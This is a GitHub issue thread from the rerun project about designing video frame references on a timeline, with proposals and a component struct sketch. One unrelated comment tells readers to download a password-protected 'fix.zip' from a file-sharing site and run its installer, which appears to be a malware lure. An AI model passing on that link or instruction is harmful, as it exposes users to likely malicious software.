rerun-io/rerun #7272: Design for "Video Frame References"

jleibs, 2024-08-26:
## Context
- https://github.com/rerun-io/rerun/pull/7261 introduces an initial proof-of-concept for video

The original idea was that we could use the delta time between when the video is logged and the current time on the timeline to determine which frame is presented. While this works in theory, in practice there are several related issues:
- How time-points are mapped to the current timeline selection has a lot of room for confusion. Need assorted options such as per-timeline scalefactor that are easy to get wrong.
- Because we don't know the duration of the video, the timeline just shows it as a single event at the start-time. However, it would still be nice for users to be able to see the actual time-points where the different frames occur.
- When querying data back from Rerun it would also be nice to be able to make reference to a video frame for alignment with other data in the same joined row.

## Possible solutions

We suspect that we want some way of converting a video into a bunch of events that all reference the same video payload at log-time. However there are a number of choices for how we approach this.

The HF lerobot dataset, for example, encodes video in a column as `Struct<uri: String, pts: Timestamp>`

We could do something similar, but we still have many choices for what kind of reference to support: 
- An implicit component on the same entity? LatestVideo
- A concrete entity + row?
- A generic side-band "blob asset"?

Additionally, there are open questions for how the column of video-frame-reference data is generated:
- We could just make user do this themselves. If they encoded the video they should know the pts timestamps already. This would certainly be the easiest to implement but maybe a heavy lift for users.
- We could provide rust-code which parses the mp4 container and does this for the user via something like `log_video`, or returns the list of PTS timestamps back to user code.
- We could still think of this as some kind of "conversion" process that happens downstream of logging and creates a new derived column from the original data.

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

emilk, 2024-09-03:
Something like this?

```
component struct VideoFrameReference {
    video_time_pts_sec: Option<f64>,
    
    video_frame_number: Option<u64>,
    
    /// Reference to an entity with a `VideoAsset`
    // null = self
    entity: Option<EntityPath>,
}
```

emilk, 2024-09-06:
Design in https://github.com/rerun-io/rerun/issues/7368

closed 2024-09-06 by emilk